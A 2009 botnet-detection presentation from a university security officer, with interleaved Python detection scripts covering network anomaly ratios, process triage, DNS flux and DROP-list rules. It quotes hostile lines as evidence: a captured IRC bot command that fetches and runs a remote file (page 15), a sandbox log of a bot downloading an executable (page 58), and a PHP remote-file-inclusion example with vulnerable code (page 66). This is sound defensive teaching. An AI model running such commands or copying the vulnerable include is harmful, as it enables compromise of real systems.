Page 1: Botnet Phd (Piled Higher and Deeper)

A Presentation About Botnet Detection for the NWACC 09 Security Workshop

by Craig A Schiller, CISSP-ISSMP, ISSAP
Chief Information Security Officer
Portland State University

© 2009 Craig A Schiller

Page 2: Agenda

• Introduction
• Detection
• Forensics/Intel Gathering
• Malware Analysis
• Incident Response
• Prevention

Page 3: Primary Source

Page 4: (image)

Page 5: Agenda (as on page 2)

Page 6: How Do We Detect Them?

Bot life cycle (diagram):
• Computer is exploited, becomes a bot
• New bot rallies to let the botherder know it has joined the team
• Retrieve the anti-A/V module
• Secure the new bot client
• Retrieve the payload module
• Listen to the C&C server/peer for commands
• Execute the commands
• Report result to the C&C channel
• On command, erase all evidence and abandon the client

Diagram labels: User browsing malicious sites; A/V detection; other bot clients; C&C; download server; possible traffic to victim.

Page 7: How Do We Detect Them? (continued)

Detection points added to the same diagram:
• Known malware distribution sites
• Known C&C sites
• Security & FW logs
• Abuse@ notices
• User complaint
• Anomalous protocol detection
• Botlike traffic / bad behavior
• Talking to Darknet

Page 8: How Do We Detect Them?

"I checked and I didn't see anything"

• A/V, Anti-Spam, Anti-Spyware (host based; enterprise reporting)
• User Help Desk Tickets
• Abuse notifications
• Quasi-Intelligence Organizations
• Monitoring & Analysis: Ourmon; Firewall & Router logs; IDS/IPS – Host and Network; DNS; Server & Workstation log analysis; Malware analysis; Forensics

Page 9: Ourmon

Free network security monitoring tool, with botnet detection capabilities.

http://ourmon.cat.pdx.edu/ourmon/index.html

Page 10: Network Anomaly Detection

• Is it scanning?
• Is it participating in an IRC channel?
• Is there a high control-to-data ratio?
• Is the IRC server/port listed as a known Command & Control server?
• Does the IRC traffic text look botlike?
• Did the host look up, or attempt to communicate with, a known C&C server?
• Did the host attempt to communicate with an IP address in the Darknet?

Page 11: Network Anomaly Detection

TCP work weight:

    ww = (SYNs sent + FINs sent + RESETs returned) / total TCP packets

A measure of signal/noise (control/data). A high number means the traffic is all control (a SYN scanner); basically it means an IP is scanning.

Page 12: Network Anomaly Detection

Ourmon does a similar calculation with IRC traffic: a measure of signal/noise (control/data). A high number means non-human communication; basically it means a bot or an application (a game).
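The two ratios from pages 11 and 12, computed over constructed traffic, as an added example (this is not Ourmon's code; the packet tuples, the IRC lines, the set of IRC commands treated as "control" and the 0.9 alarm threshold are all assumptions made here to illustrate the slides):

```python
"""TCP work weight per host, plus an IRC control/data analog of it."""
from collections import defaultdict
from dataclasses import dataclass

# TCP flag bits as laid out in the TCP header
FIN, SYN, RST, ACK = 0x01, 0x02, 0x04, 0x10

SCANNER, NORMAL = "10.0.0.5", "10.0.0.7"   # constructed local hosts


@dataclass
class Counts:
    total: int = 0    # TCP packets sent by or returned to the host
    syns: int = 0     # SYNs the host sent
    fins: int = 0     # FINs the host sent
    resets: int = 0   # RSTs its peers returned

    def work_weight(self) -> float:
        """ww = (SYNs sent + FINs sent + RSTs returned) / total TCP packets."""
        return (self.syns + self.fins + self.resets) / self.total if self.total else 0.0


def tally(packets, hosts):
    """Count control vs. all TCP packets for each monitored host.

    packets: iterable of (src_ip, dst_ip, tcp_flags); hosts: set of local IPs.
    """
    counts = defaultdict(Counts)
    for src, dst, flags in packets:
        if src in hosts:
            c = counts[src]
            c.total += 1
            if flags & SYN:
                c.syns += 1
            if flags & FIN:
                c.fins += 1
        if dst in hosts:
            c = counts[dst]
            c.total += 1
            if flags & RST:
                c.resets += 1
    return dict(counts)


def scanners(counts, threshold=0.9):
    """Hosts whose traffic is nearly all control; the threshold is an assumption."""
    return sorted(h for h, c in counts.items() if c.work_weight() >= threshold)


# IRC analog: protocol housekeeping is "control", PRIVMSG/NOTICE carry "data".
IRC_CONTROL = {"JOIN", "PART", "PING", "PONG", "NICK", "USER", "MODE"}


def irc_control_ratio(lines):
    """Fraction of a host's IRC messages that are control commands."""
    control = total = 0
    for line in lines:
        parts = line.split()
        if not parts:
            continue
        cmd = parts[1] if parts[0].startswith(":") else parts[0]  # skip ':prefix'
        total += 1
        control += cmd.upper() in IRC_CONTROL
    return control / total if total else 0.0


def constructed_packets():
    """A SYN scanner probing 20 hosts beside one ordinary data connection."""
    pkts = [(SCANNER, f"192.0.2.{n}", SYN) for n in range(20)]
    pkts += [(f"192.0.2.{n}", SCANNER, RST | ACK) for n in range(18)]  # closed ports
    pkts += [(f"192.0.2.{n}", SCANNER, SYN | ACK) for n in (18, 19)]   # open ports
    peer = "198.51.100.1"
    pkts += [(NORMAL, peer, SYN), (peer, NORMAL, SYN | ACK)]
    pkts += [(h, d, ACK) for _ in range(30) for h, d in ((NORMAL, peer), (peer, NORMAL))]
    pkts += [(NORMAL, peer, FIN | ACK), (peer, NORMAL, FIN | ACK)]
    return pkts


# Constructed IRC lines; the bot's mimic the #priv8 channel shape on page 15.
BOT_IRC = [
    "NICK |00||-X-||4245", "USER bot 0 * :bot", "JOIN #priv8",
    "PING :irc.example.net", "PONG :irc.example.net",
    "PING :irc.example.net", "PONG :irc.example.net", "MODE #priv8",
    ":herder!h@example.net PRIVMSG #priv8 :.status",
    "PRIVMSG #priv8 :[MoD] idle",
]
HUMAN_IRC = ["JOIN #friends"] + [f"PRIVMSG #friends :BFF chatter {i}" for i in range(9)]

if __name__ == "__main__":
    counts = tally(constructed_packets(), {SCANNER, NORMAL})
    for host, c in counts.items():
        print(f"{host}: ww={c.work_weight():.2f}")   # 0.95 scanner, 0.03 normal
    print("scanners:", scanners(counts))
    print("IRC control ratio bot/human:", irc_control_ratio(BOT_IRC), irc_control_ratio(HUMAN_IRC))
```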

Page 13: Recent large ddos attack

The fundamental pkts graph normally looks like this: (graph)

Page 14: Ouch, ouch, ouch!

That's 869k pps – we have a physical gE connection to the Internet …

Page 15: "Botlike" IRC text

IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, channel=priv8 clen=5: p=[:[email protected] PRIVMSG #priv8 :fmj curl -o mdbn.gif http://www.warriorbride.ca/mdbn.gif;perl mdbn.gif;rm -f *.gif*]

Page 16: "Normal" IRC text

IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, channel=priv8 clen=5: p=[:[email protected] PRIVMSG #priv8 : OMG, you're just my BFF Jill! I once had a BFF that was nowhere as good a BFF as you. <and other meaningless babble> ]

Page 17: Snort signatures

• No general purpose intrusion detection.
• Limited set of bot related signatures.

Page 18: Incident Detection examples

1. today, Mcafee, 131.252.242.243, pri=hi
[**] [1:3111116:1] Mcafee http feed: :http://bluebookcarpices.com/ <http://pices.com/> (JS/Wonka) [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2]
05/21-08:13:56.950979 131.252.242.243:52733 -> 216.240.128.250:80
TCP TTL:63 TOS:0x0 ID:38398 IpLen:20 DgmLen:568 DF
***AP*** Seq: 0xD222814A Ack: 0x278524DD Win: 0xFFFF TcpLen: 32
TCP Options (3) => NOP NOP TS: 345145726 2079777105

2. today, zlob, 131.252.243.80, pri=hi
[**] [1:666666:1] zlob dns request [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
05/21-09:50:22.532193 131.252.243.80:49190 -> 85.255.115.29:53
UDP TTL:63 TOS:0x0 ID:3755 IpLen:20 DgmLen:73
Len: 45

Page 19: Quasi-Intelligence Organizations

• REN-ISAC
• Shadowserver
• Nanog
• APWG
• Mailing lists
  • Botnet: http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
  • Phishing: http://www.whitestar.linuxbox.org/mailman/listinfo/phishing
  • Vendor
• ISC Storm Center
• http://www.emergingthreats.net/
• http://www.malwaredomainlist.com

Page 20: Quasi-Intelligence Organizations (screenshot)

Page 21: Lists of Known C&C servers

http://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork#toc1
http://www.shadowserver.org/wiki/pmwiki.php/Services/Botnet-CCIP

Shadow Server Sample (a non-printable character in the channel names is shown as ?):

IP Address     | Port | Channel                   | Country | Region  | State    | Domain       | ASN   | AS Name  | AS Description
81.211.7.122   | 3267 | #B?t[r2]N?t / #B?tN?t[r3] | RU      | MOSCOW  | MOSKVA   | GLDN.NET     | 3216  | SOVAM    | AS Golden Telecom, Moscow, Russia
69.18.206.194  | 3267 | #B?t[r2]N?t / #B?tN?t[r3] | US      | COMMACK | NEW YORK | INVISION.COM | 12251 | INVISION | Invision.com, Inc.
213.234.193.74 | 6667 | #secured                  | RU      | MOSCOW  | MOSKVA   | NET.RU       | 39442 | UNICO    | AS JSC UNICO
85.21.82.55    | 6667 | #secured                  | RU      | MOSCOW  | MOSKVA   | -            | 8402  | CORBINA  | AS Corbina Telecom

Page 22: Quasi-Intelligence Organizations – REN-ISAC

Supported by Indiana University and through relationship with EDUCAUSE and Internet2, the REN-ISAC is an integral part of higher education's strategy to improve network security through information collection, analysis and dissemination, early warning, and response -- specifically designed to support the unique environment and needs of organizations connected to served higher education and research networks; and supports efforts to protect the national cyber infrastructure by participating in the formal U.S. ISAC structure.

The REN-ISAC receives, analyzes and acts on operational, threat, warning and actual attack information derived from network instrumentation and information sharing relationships. Instrumentation data include netflow, router ACL counters, darknet monitoring, and Global Network Operations Center operational monitoring systems. Information sharing relationships are established with other ISACs, DHS/US-CERT, private network security collaborations, network and security engineers on national R&E network backbones, and the REN-ISAC members.

Page 23: Spamhaus Drop List

The Spamhaus Don't Route Or Peer List

DROP (Don't Route Or Peer) is an advisory "drop all traffic" list, consisting of stolen 'zombie' netblocks and netblocks controlled entirely by professional spammers. DROP is a tiny sub-set of the SBL designed for use by firewalls and routing equipment.

DROP is currently available as a simple text list, but will also be available shortly as BGP with routes of listed IPs announced via an AS# allowing networks to then null those routes as being IPs that they do not wish to route traffic for.

The DROP list will NEVER include any IP space "owned" by any legitimate network and reassigned - even if reassigned to the "spammers from hell". It will ONLY include IP space totally controlled by spammers or 100% spam hosting operations. These are "direct allocations" from ARIN, RIPE, APNIC, LACNIC, and others to known spammers, and the troubling run of "hijacked zombie" IP blocks that have been snatched away from their original owners (which in most cases are long dead corporations) and are now controlled by spammers or netblock thieves who resell the space to spammers.

When implemented at a network or ISP's 'core routers', DROP will protect all the network's users from spamming, scanning, harvesting and dDoS attacks originating on rogue netblocks.

Spamhaus strongly encourages the use of DROP by tier-1s and backbones. See the DROP FAQ for information on use and implementation.

Page 24: Spamhaus Drop List excerpt 9/17/09

Networks named in the excerpt: UkrTeleGroup, Nevacon, Sonic Colo-HK, Beijing HuaXingGuangWang, InfoVision Data Hosting Service (three listings), InfoMove Limited HK. Each entry pairs a netblock (CIDR) with its SBL record number.


Page 25: Malware Domain List (screenshot)

Page 26: DNS for Botnet Detection

"I checked and I didn't see anything"

Page 27: DNS for Botnet Detection

http://www.enyo.de/fw/software/dnslogger/
http://www.enyo.de/fw/software/dnslogger/whois.html

DB of all lookups for: Known C&C; Known Malicious SW Distros

Page 28: knujon – 10 Most Offensive Registrars

• XIN NET (Second Time at #1)
• eNom
• Network Solutions
• Register.com
• PLANETONLINE
• RegTime
• OnlineNIC
• SpotDomains (domainsite)
• Wild West
• HICHINA Web Solutions

Page 29: Search Engine Spam & Clicks 4 Hire

Use Google to search your own site for Clicks-4-Hire relays and search engine spam:

    site:yoursite.com -pdf -ppt -doc phentermine OR viagra OR cialis OR vioxx OR oxycontin OR levitra OR ambien OR xanax OR paxil OR "slot-machine" OR "texas-holdem"

Page 30: Google site search results (screenshot)

Page 31: An owned webpage (screenshot)

Page 32: Browser Intelligence gathering (screenshot)

Page 33: Links to this web page (screenshot)

Page 34: Man in the Browser Attack – torpig (screenshot)

Page 35: Agenda (as on page 2)

Page 36: Forensics/Intel Gathering

• Quick Forensics
  • Log Analysis
  • Process Explorer
  • TCPView
  • AutoRuns
  • Process Monitor
• Rapier – First Responder Tool
  • Automated Forensics
  • Consistent information gathered regardless of who runs it
• Sleuthing
  • How did they get in?
  • What does it do?
  • What files are used?
  • When did what happen?
• Malware Analysis
• More Sleuthing

Page 37: Log analysis

"I checked and I didn't see anything"

Page 38: Forensics/Intel Gathering example

Process Explorer listing:

Process             | PID  | CPU   | Description                             | Company Name
System Idle Process | 0    | 93.36 |                                         |
Interrupts          | n/a  | 1.56  | Hardware Interrupts                     |
DPCs                | n/a  |       | Deferred Procedure Calls                |
System              | 4    | 0.39  |                                         |
smss.exe            | 508  |       | Windows NT Session Manager              | Microsoft Corporation
csrss.exe           | 620  |       | Client Server Runtime Process           | Microsoft Corporation
winlogon.exe        | 884  |       | Windows NT Logon Application            | Microsoft Corporation
services.exe        | 944  |       | Services and Controller app             | Microsoft Corporation
svchost.exe         | 1180 |       | Generic Host Process for Win32 Services | Microsoft Corporation
wmiprvse.exe        | 3400 |       | WMI                                     | Microsoft Corporation
svchost.exe         | 1252 |       | Generic Host Process for Win32 Services | Microsoft Corporation
svchost.exe         | 1312 |       | Generic Host Process for                |
PSXSS.EXE           | 896  |       | Interix Subsystem Server                | Microsoft Corporation
init                | 2156 |       | Interix Utility                         | Microsoft Corporation
inetd               | 2432 |       | Interix Utility                         | Microsoft Corporation
iexplorer.exe       | 3560 |       |                                         |
explorer.exe        | 8564 |       | Windows Explorer                        | Microsoft Corporation
ccApp.exe           | 9208 |       | Symantec User Session                   | Symantec Corporation
VPTray.exe          | 8636 |       | Symantec AntiVirus                      | Symantec Corporation
VPC32.exe           | 9524 |       | Symantec AntiVirus                      | Symantec Corporation
iexplorer.exe       | 6712 |       |                                         |
sqlmangr.exe        | 9904 |       | SQL Server Service Manager              | Microsoft Corporation
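A first-pass triage of a Process Explorer listing like the one above, as an added example that is not part of the presentation: it parses a pipe-separated copy of the rows (constructed here from the slide), flags user-mode processes with no company name, and flags names within one edit of a known Windows binary. The allowlist and the edit-distance rule are assumptions chosen for this illustration.

```python
"""Flag anomalous rows in a Process Explorer style listing."""
from dataclasses import dataclass

# Binaries one expects on the XP-era host shown on the slide (an assumption).
EXPECTED = {
    "smss.exe", "csrss.exe", "winlogon.exe", "services.exe", "svchost.exe",
    "explorer.exe", "iexplore.exe", "lsass.exe", "wmiprvse.exe",
}
# Kernel pseudo-processes legitimately carry no company name.
KERNEL_ROWS = {"system idle process", "interrupts", "dpcs", "system"}

# Constructed from the slide's rows; the header line is skipped by the parser.
LISTING = """
Process | PID | Description | Company Name
System Idle Process | 0 | |
Interrupts | n/a | Hardware Interrupts |
DPCs | n/a | Deferred Procedure Calls |
System | 4 | |
smss.exe | 508 | Windows NT Session Manager | Microsoft Corporation
csrss.exe | 620 | Client Server Runtime Process | Microsoft Corporation
winlogon.exe | 884 | Windows NT Logon Application | Microsoft Corporation
services.exe | 944 | Services and Controller app | Microsoft Corporation
svchost.exe | 1180 | Generic Host Process for Win32 Services | Microsoft Corporation
PSXSS.EXE | 896 | Interix Subsystem Server | Microsoft Corporation
iexplorer.exe | 3560 | |
explorer.exe | 8564 | Windows Explorer | Microsoft Corporation
VPTray.exe | 8636 | Symantec AntiVirus | Symantec Corporation
iexplorer.exe | 6712 | |
sqlmangr.exe | 9904 | SQL Server Service Manager | Microsoft Corporation
"""


@dataclass
class Proc:
    name: str
    pid: str
    description: str
    company: str


def parse_listing(text):
    """Parse 'name | pid | description | company' rows into Proc objects."""
    procs = []
    for line in text.strip().splitlines()[1:]:
        name, pid, desc, company = (f.strip() for f in line.split("|"))
        procs.append(Proc(name, pid, desc, company))
    return procs


def edit_distance(a, b):
    """Levenshtein distance by plain dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalikes(name, known, max_dist=1):
    """Known binaries whose name differs from `name` by at most max_dist edits."""
    return sorted(k for k in known if k != name and edit_distance(name, k) <= max_dist)


def triage(procs):
    """Return {pid: [reasons]} for processes that deserve a closer look."""
    suspicious = {}
    for p in procs:
        name = p.name.lower()
        reasons = []
        if name not in KERNEL_ROWS and not p.company:
            reasons.append("no company name")
        near = lookalikes(name, EXPECTED)
        if near:
            reasons.append("name resembles " + ", ".join(near))
        if reasons:
            suspicious[p.pid] = reasons
    return suspicious


if __name__ == "__main__":
    for pid, reasons in triage(parse_listing(LISTING)).items():
        print(pid, reasons)   # the two iexplorer.exe rows, 3560 and 6712
```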

Page 39: Forensics/Intel Gathering example (screenshot)

Page 40: Forensics/Intel Gathering example (screenshot)

Page 41: Forensics/Intel Gathering example

Strings in the file iexplorer.exe

Strings in memory

Page 42: Centralized Logging

Diagram labels: NTSyslog; Internet log collection; log collection / analysis server; MySQL database.

Page 43: Workstation Log Analysis

Log Parser
http://www.microsoft.com/downloads/details.aspx?FamilyID=890cd06b-abf8-4c25-91b2-f8d975cf8c07&displaylang=en

Page 44: A/V Centralized Reporting

Blocked by port blocking rule:

3/25/2008 12:56:26 PM C:\Program Files\DNA\btdna.exe Prevent IRC communication 202.57.184.145:6666
3/25/2008 6:26:40 PM C:\Program Files\DNA\btdna.exe Prevent IRC communication 83.252.58.149:6666
3/25/2008 8:55:30 PM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666
3/25/2008 11:24:38 PM C:\Program Files\DNA\btdna.exe Prevent IRC communication 80.222.68.139:6667
3/26/2008 3:37:41 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666
3/26/2008 5:07:33 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666
3/26/2008 7:23:09 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 80.222.68.139:6667
3/26/2008 7:38:59 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666
3/26/2008 7:54:09 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 80.222.68.139:6667
3/26/2008 10:40:04 AM C:\Program Files\DNA\btdna.exe Prevent IRC communication 85.21.246.228:6666
3/26/2008 10:54:53 AM C:\Program Files\DNA\btdna.exe Prevent mass mailing worms from sending mail 41.220.121.130:25

Use (examine) the central reporting feature of your antivirus server.

Page 45: A/V Centralized Reporting

5/9/2008 4:53:34 PM Would be blocked by Access Protection rule (rule is currently not enforced) PSU\anyman C:\Program Files\Internet Explorer\iexplore.exe C:\Documents and Settings\anyman\Local Settings\Temporary Internet Files\Content.IE5\BDX492TE\MediaTubeCodec_ver1.556.0[1].exe Common Standard Protection: Prevent common programs from running files from the Temp folder Action blocked : Execute

MediaTubeCodec is a fake codec that installs malware and tells you that your computer is infected so you will download a fake antivirus product.

This appeared in the logs before McAfee could detect this malware.

Page 46: A/V Centralized Reporting

5/12/2008 9:01:50 AM User defined detection: SPYWARE (Potentially Unwanted Program) No Action Taken (Delete failed) SYSTEM McShield.exe C:\Documents and Settings\anyman\Desktop\ctfmona.exe
5/12/2008 9:02:31 AM User defined detection : No Action Taken (Clean failed because the detection isn't cleanable) SYSTEM McShield.exe C:\Documents and Settings\anyman\Desktop\ctfmona.exe

What does quarantine or "No Action Taken" mean?

Page 47: Detectable Behavior

• Multi-homed DNS – FQDN maps to 3 or more IP addresses
    botnet1.example.com pointing to 127.0.0.1
    botnet1.example.com pointing to 127.0.0.2
    botnet1.example.com pointing to 127.0.0.3
    botnet1.example.com pointing to 127.0.0.4
    botnet1.example.com pointing to 127.0.0.5
    botnet1.example.com pointing to 127.0.0.6
• Dynamic DNS used thru commercial site – Change IP addresses quickly
• Short DNS TTLs for clients – Remap DNS often, check at boot
• FastFlux DNS – Change IP addresses and/or DNS names quickly (for spam < 5 minutes) and often
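The three DNS behaviours above that are visible in recorded answers (multi-homed, short TTL, fast flux) scored over constructed passive-DNS observations, as an added example not taken from the presentation or from dnslogger: the record layout is an assumption, and the thresholds (3 addresses, 300 seconds) are taken from the slide.

```python
"""Passive-DNS triage for multi-homed, short-TTL and fast-flux names."""
from collections import defaultdict
from dataclasses import dataclass

MULTIHOMED_MIN_IPS = 3     # slide: FQDN maps to 3 or more IP addresses
SHORT_TTL_SECONDS = 300    # slide: "< 5 minutes" for spam fast flux


@dataclass(frozen=True)
class Answer:
    seen_at: int     # epoch seconds when the response was observed
    qname: str
    rdata: str       # IPv4 address from an A record
    ttl: int


def group_responses(answers):
    """Regroup A records into the responses they arrived in.

    Returns {qname: [(seen_at, min_ttl, frozenset(ips)), ...]} sorted by time;
    all records for one name observed at the same instant form one response.
    """
    ips = defaultdict(set)
    ttls = {}
    for a in answers:
        key = (a.qname, a.seen_at)
        ips[key].add(a.rdata)
        ttls[key] = min(a.ttl, ttls.get(key, a.ttl))
    out = defaultdict(list)
    for (qname, t), addrs in ips.items():
        out[qname].append((t, ttls[(qname, t)], frozenset(addrs)))
    for qname in out:
        out[qname].sort()
    return out


def assess(answers):
    """Return {qname: sorted behaviour labels} for every name observed."""
    findings = {}
    for qname, responses in group_responses(answers).items():
        labels = set()
        if any(len(addrs) >= MULTIHOMED_MIN_IPS for _, _, addrs in responses):
            labels.add("multi-homed")
        if any(ttl < SHORT_TTL_SECONDS for _, ttl, _ in responses):
            labels.add("short-ttl")
        # Fast flux: the address set changes between responses < 5 minutes apart.
        for (t0, _, a0), (t1, _, a1) in zip(responses, responses[1:]):
            if a1 != a0 and t1 - t0 < SHORT_TTL_SECONDS:
                labels.add("fast-flux")
                break
        findings[qname] = sorted(labels)
    return findings


def constructed_observations():
    """A stable site, a multi-homed name in the slide's 127.0.0.x style, and a fluxing name."""
    obs = [Answer(t, "www.example.com", "198.51.100.10", 3600) for t in (0, 1800)]
    obs += [Answer(100, "botnet1.example.com", f"127.0.0.{i}", 600) for i in range(1, 7)]
    for k, t in enumerate(range(200, 500, 60)):          # a fresh pair every 60 s
        obs += [Answer(t, "flux.example.net", f"203.0.113.{2 * k + 1}", 30),
                Answer(t, "flux.example.net", f"203.0.113.{2 * k + 2}", 30)]
    return obs


if __name__ == "__main__":
    for qname, labels in assess(constructed_observations()).items():
        print(f"{qname}: {labels or 'nothing notable'}")
```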

Page 48: Hiding the C&C Server or Phishing Website

The above animation demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.

Page 49: Passive DNS

http://cert.uni-stuttgart.de/stats/dns-replication.php?query=differbe.hk&submit=Query
https://dnsparse.insec.auckland.ac.nz/dns/index.html

Page 50: Fast Flux DNS example (screenshot)

Page 51: Internal Intelligence gathering

Rapier – A First Responder Toolkit developed by Steve Mancini, Intel
http://code.google.com/p/rapier/

Page 52: Rapier (screenshot)

Page 53: Malware Hash Registry

http://www.team-cymru.org/Services/MHR/

"Cymru is happy to announce the availability of various service options dedicated to mapping suspected malware hashes to our insight about positively identified malware. Now you can check if a particular piece of code is malware by querying against the extensive Team Cymru Malware Hash Registry."

Using whois:

    $ whois -h hash.cymru.com e1112134b6dcc8bed54e0e34d8ac272795e73d74
    e1112134b6dcc8bed54e0e34d8ac272795e73d74 1221154281 53

Using DNS (dig):

    $ dig +short 733a48a9cb49651d72fe824ca91e8d00.malware.hash.cymru.com TXT
    "1221154281 53"

Response fields: Unix time (seconds since midnight 1970-01-01), then % A/V package detection rate.

Page 54: Alternate C&C Methods

"I checked and I didn't see anything"

Echo-Based Botnets

Echo-based means the bot simply announces its existence to the C&C. There are several ways of doing this, with different volumes of data relayed:
• Connect & forget
• File data
• URL data

Command-Based Botnets
• Web GUI based
• Push rather than pull
• P2P
• IM
• Social Networking (MySpace profiles)
• Remote Administration Tools: Dameware, CarbonCopy, Terminal Services, PC Anywhere, RDP
• Drop zone – ftp is the leading protocol here
• ftp – phishing C&C – regularly reports back (echoes) to an FTP C&C,

Page 55: Incident Response

• Required by OUS Information Security policy
• PSU Information Security policy requires an Incident Response plan
• PSU has several means of discovering incidents

Page 56: Agenda (as on page 2)

Carsten Willem’s CWSandboxCarsten Willem’s CWSandbox

VMWare

XP Pro

Ubuntu

Page 58: Botnet Phd (Piled Higher and Deeper) Craig A Schiller, CISSP-ISSMP,ISSAP Chief Information Security Officer Portland State University A Presentation About.

© 2009 Craig A Schiller 58

I checked and I didn’t see anything

Malware analysisMalware analysisCWSandbox

- <scanner name="AntiVir Workstation" application_version="2.1.9-20" signature_file_version="6.37.0.90">  <classification>WORM/Rbot.219136.17</classification>   <additional_info />   </scanner>

- <connections_outgoing>- <connection transportprotocol="TCP" remoteaddr=“192.168.209.5" remoteport="13601" protocol="IRC" connectionestablished="1" socket="448">- <irc_data username="|00||-X-||4245" password="bong" nick="|00||-X-||4245">  <channel name="#sym" topic_deleted=":.download http://wooop.mooo.com/buz/120.exe c:\120.exe 1" />   <privmsg_deleted value=":|00||-X-||[email protected] PRIVMSG #sym :_CHAR(0x03)_9-_CHAR(0x03)_1::_CHAR(0x03)_0[_CHAR(0x03)_12 120|MoD_CHAR(0x03)_0 ]_CHAR(0x03)_1::_CHAR(0x03)_9-_CHAR(0x03)_ Downloaded 324.0 KB to c:\120.exe @ 6.9 KB/sec." />     </irc_data>  </connection>

Page 59: Analyzing the Malware

CWSandbox Analysis (screenshot)

Page 60: The Future

Honeypots

Page 61: Agenda (as on page 2)

Page 62

Responding to Detection

(Swimlane diagram; the text below lists what it shows.)

Botnet sensors:
• Security Researcher
• Internet
• Wormwatch mailing list
• 131.252.x.x NERO says bad
• 131.252.x.x Acting Bad
• 131.252.x.x talking to bad
• 38.100.x.x McAfee says bad
• McAfee Server
• User Reports

Lanes: Network Team, User Support, Server Support, TAGs, Security Team

Response steps (in the order they appear on the slide):
• Create Tracking Ticket
• Block Network access
• Identify location
• Identify computer or user
• Retrieve computer
• Backup all files
• Perform quick forensics
• Re-image computer
• Identify Server or webpage owner
• Identify compromised account
• Locate malware
• Determine attack vector

Security Team:
• Locate infected system
• Identify system owner
• Re-image computer
• Identify computer or user
• Review quick forensics
• Perform deep forensics
• Ensure appropriate resources are working the incident
• Identify useful intelligence markers

Page 63

Agenda

• Introduction
• Detection
• Forensics/Intel Gathering
• Malware Analysis
• Incident Response
• Prevention

Page 64

Blocking Organized Crime supporters

If your ISP doesn't already block them, you can add known criminals to your firewall rules or to your DNS dump tables.

Use the Spamhaus DROP list to block known evil sites

Intercage, Inhoster, and Nevacon:
85.255.112.0/20 #SBL36702 (85.255.112.0 - 85.255.127.255)
69.50.160.0/19 (69.50.160.0 - 69.50.191.255)
194.146.204.0/22 #SBL51152 (194.146.204.0 - 194.146.207.255)

Blog that tracks RBN activities:

http://rbnexploit.blogspot.com/
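
Turning the DROP list into firewall rules is mostly a parsing job, but the details matter: a CIDR with host bits set silently produces a rule that matches nothing, and the same data is just as useful for enriching logs as for blocking. The script below is an added example (not from the slides, not a Spamhaus tool) that parses DROP-format text, renders iptables rules, and answers "is this address inside a listed block?" for log enrichment. The DROP file format (one "CIDR ; SBLref" per line, ';' starting a comment) is the public one; the sample is constructed from the netblocks on this slide, and the SBL reference for 69.50.160.0/19, which the slide does not give, is a placeholder.

```python
"""Turn a Spamhaus DROP-format list into firewall rules and an address lookup.

Added example, not from the slides and not a Spamhaus tool. The sample list is
constructed from the slide's netblocks; the SBL reference for 69.50.160.0/19
is a placeholder because the slide does not give one.
"""
import ipaddress

# Constructed sample in DROP format (netblocks from the slide).
SAMPLE_DROP = """; Spamhaus DROP List -- constructed sample for this example
; Last-Modified: Tue, 01 Sep 2009 00:00:00 GMT
85.255.112.0/20 ; SBL36702
69.50.160.0/19 ; SBL-REF-PLACEHOLDER
194.146.204.0/22 ; SBL51152
"""


def parse_drop(text):
    """Return [(ip_network, sbl_ref), ...]; comment and blank lines are skipped.

    strict=True makes ipaddress reject a CIDR with host bits set, the kind of
    typo that silently turns a /20 block into a useless rule.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        cidr, _, ref = line.partition(";")
        entries.append((ipaddress.ip_network(cidr.strip(), strict=True), ref.strip()))
    return entries


def iptables_rules(entries, chain="SPAMHAUS_DROP"):
    """Render iptables commands that drop traffic to and from every netblock."""
    rules = [f"iptables -N {chain}"]
    for net, ref in entries:
        rules.append(f"iptables -A {chain} -s {net} -j DROP  # {ref}")
        rules.append(f"iptables -A {chain} -d {net} -j DROP  # {ref}")
    for builtin in ("INPUT", "FORWARD", "OUTPUT"):
        rules.append(f"iptables -I {builtin} -j {chain}")
    return rules


def lookup(entries, ip):
    """Return (netblock, sbl_ref) if ip falls inside a listed block, else None.

    Useful for enriching firewall or proxy logs: a hit on an internal host's
    peer address is a strong 'talking to bad' signal.
    """
    addr = ipaddress.ip_address(ip)
    for net, ref in entries:
        if addr in net:
            return str(net), ref
    return None


if __name__ == "__main__":
    blocks = parse_drop(SAMPLE_DROP)
    for net, ref in blocks:
        print(f"{net}  ({net.network_address} - {net.broadcast_address})  {ref}")
    print("\n".join(iptables_rules(blocks)))
    print(lookup(blocks, "85.255.120.1"))
```

The broadcast addresses the script prints for the three blocks are the upper ends of the ranges quoted on the slide, which is a quick way to confirm a CIDR was copied correctly before it goes into a rule set.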

Page 65

How do they get into User systems?

• Guessing weak passwords / phishing attacks
• Exploiting network vulnerabilities
• Using social engineering
• Using web-based Trojans
  - Trojan websites: game cheats
  - Trojan websites: pornography
• Using email-based Trojans
  - Phishing & pharming
  - Trojan downloads
• Using IM-based Trojans (social engineering)
• Rogue DHCP server serving malicious DNS server

Page 66

How do they get into Servers? PHP includes

(Diagram: Attacker, Target.com, Webhost.com.)

Vulnerable code on Target.com: <?php include($vuln); ?>

1. GET /a.php?vuln=http://webhost.com/evil.php
2. Target makes request to webhost.com/evil.php
3. Malware PHP file ‘evil.php’ is sent to Target.com and is executed by the include() function.
4. The output from evil.php is sent to Attacker

Page 67

How do they get into Servers? SQL Injection

--c295b75d-A--
